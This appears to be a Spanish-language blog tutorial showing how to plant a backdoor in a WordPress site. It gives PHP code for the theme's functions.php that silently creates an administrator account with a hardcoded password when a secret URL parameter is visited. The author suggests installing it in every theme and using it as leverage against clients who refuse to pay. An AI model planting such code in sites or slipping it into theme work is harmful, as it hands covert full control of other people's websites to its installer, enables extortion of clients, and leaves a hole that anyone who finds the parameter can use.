Como crear un BackDoor en WordPress

601
WordPress BackDoor

Prime, para crear un BackDoor en WordPress, previamente debes contar con permisos de administrador, generalmente es usado por desarrolladores con distintos motivos.

¿Qué harías si pudieras crear un acceso secreto para acceder como administrador a un WordPress?

Hoy te voy a enseñar a crear una “puerta trasera” o “BackDoor” a una Web hecha con WordPress a cuyo servidor tengas acceso.

Aspecto importantes de este BackDoor en WordPress

Este truco no te permite hackear cualquier WordPress, sólo crear o bien instalar una BackDoor en un Sitio Web a cuyo servidor puedas acceder en un futuro en caso de ser necesario.

El uso que quieras darle a esta puerta trasera depende de ti… pero se me ocurren dos usos “benévolos”:

  • Como medida de seguridad en caso de que un cliente pierda el acceso a la Web y no tenga ninguna forma de recuperarlo
  • Como medida de presión en caso de que un cliente se niegue a pagar un trabajo que a tu parecer esta concluido.

En realidad se me ocurren muchos usos “malévolos” para un backdoor, pero prefiero dejar que utilices tu imaginación en este sentido, al final todo tiene que ver con la ética que tengas.

Crear un BackDoor en WordPress en 1 Paso

Pega el siguiente código en el archivo functions.php del tema de WordPress que esta activo en el sitio web o que supones estará activo al momento de tu acceso, igualmente por si las dudas, yo pegaría el código en todos los temas instalados:

/* Función para crear una puerta trasera en WordPress */
add_action('wp_head', 'puerta_trasera');
function puerta_trasera() {
  If ($_GET['backdoor'] == 'create') {
    require('wp-includes/registration.php');
    If (!username_exists('backdoor')) {
      $user_id = wp_create_user('backdoor', 'c0ntra5eNYa');
      $user = new WP_User($user_id);
      $user->set_role('administrator');
      echo 'Puerta trasera creada';
      die();
    }
  }
}

Si no existe el archivo functions.php en tu tema, créalo y recuerda poner <?php al comienzo para que pueda ejecutarse el código PHP.

Ahora ya está listo para ejecutarse en caso necesario.

Como ejecutar el BackDoor en WordPress

En el caso de que necesites crear una puerta trasera a WordPress, accede a la Web introduciendo el parámetro ?backdoor=create al final de la URL, de la siguiente forma:

http://www.dominiodeinteres.com/?backdoor=create

Esto hace que WordPress ejecute el código que hemos introducido en el archivo functions.php y cree un usuario con permisos de administrador.

Acceder a WordPress desde el BackDoor creado

Ahora podrás ingresar en WordPress accediendo a http://tudominio.com/wp-login.php o como normalmente lo harías, basado en el ejemplo que se utilizo solo bastará utilizar las siguientes credenciales para obtener acceso total al sitio:

Usuario:        backdoor
Contraseña:  c0ntra5eNYa

NOTA: Recuerda cambiar el usuario y contraseña en tu código PHP.

Una vez dentro, verás que tienes permisos de administrador, lo que significa que puedes hacer todo lo que quieras, incluso eliminar a otros administradores si así lo deseas.

Antes de usar este código considera la siguiente Advertencia

El hecho de que puedas crear una puerta trasera en el sitio web de un cliente no significa que debas usarla para fines personales o perjudicarlo.

Ten en cuenta que utilizar este código es un riesgo para la seguridad de la Web. Cualquiera podría ejecutar esta función si llama al parámetro correcto en la URL.

CONSULTA CON TU ABOGADO PRIMERO: si vas a utilizar este código en la Web de un cliente, tal vez debas especificar en el contrato que firméis que podrías utilizar una puerta trasera en caso de impago o pérdida de las credenciales de acceso.

Deja tu comentario, consulta o duda referente al tema y con gusto responderé a tus inquietudes.

Si te ha gustado esta información, me gustaría que me ayudaras a compartirla en las redes sociales, igualmente te invito a leer “Crear un Child Theme o Tema Hijo en WordPress con 1 Clic” y “Como obtener la URL de publicación de Facebook“.

Saludos y hasta la próxima!